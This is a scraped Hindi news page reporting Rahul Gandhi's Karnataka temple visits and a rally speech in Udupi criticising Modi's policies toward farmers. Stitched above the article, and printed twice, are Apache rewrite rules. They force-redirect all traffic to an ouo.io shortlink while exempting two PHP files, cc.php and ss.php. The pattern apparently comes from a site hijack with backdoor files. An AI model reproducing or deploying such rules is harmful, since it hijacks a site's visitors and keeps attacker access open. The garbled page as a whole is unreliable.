
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 687
Previousचिकमंगलूर। कांग्रेस अध्यक्ष राहुल गांधी का कर्नाटक दौरे का दूसरा दिन है। राहुल गांधी आज श्रृंगेरी शारदार पीठ पहुंचे हैं। इससे पहले उन्होंने मैंगलोर में गोकर्णनाथेश्वर मंदिर में दर्शन किए। इस दौरान राहुल ने पारंपरिक धोती पहनकर दर्शन के लिए पहुंचे थे। आपको बता दें कि इससे पहले कल कर्नाटक के 12वीं सदी के समाज सुधारक बासवन्ना का जिक्र करते हुए कांग्रेस अध्यक्ष राहुल गांधी ने कहा कि प्रधानमंत्री नरेंद्र मोदी की नीतियां समावेशी नहीं हैं, क्योंकि उन्होंने किसानों को दरकिनार कर दिया, लेकिन बड़े उद्योगपतियों के कर्ज माफ कर दिए। राहुल ने तटीय उडिपी जिले में एक सार्वजनिक रैली को संबोधित करते हुए कहा, मोदी बासवन्ना के बारे में बात करते हैं, लेकिन उनकी नीतियां समावेशी नहीं हैं। यदि वह बड़े उद्योगपतियों के 25 लाख करोड़ रुपये के कर्ज माफ कर सकते हैं, तो किसानों की मदद क्यों नहीं कर सकते।
राहुल ने उपस्थित जनसमूह से कहा कि यद्यपि किसानों को उनके उत्पादों के लिए उचित एमएसपी (न्यूनतम समर्थन मूल्य) का वादा किया गया था, लेकिन उसे पूरा नहीं किया गया। कांग्रेस अध्यक्ष ने कहा, इसके ठीक विपरीत हमारी राज्य सरकार ने सिंचाई परियोजनाओं पर मोदी सरकार द्वारा पूरे देश के लिए किए गए खर्च से तीन गुना धनराशि खर्च किया है।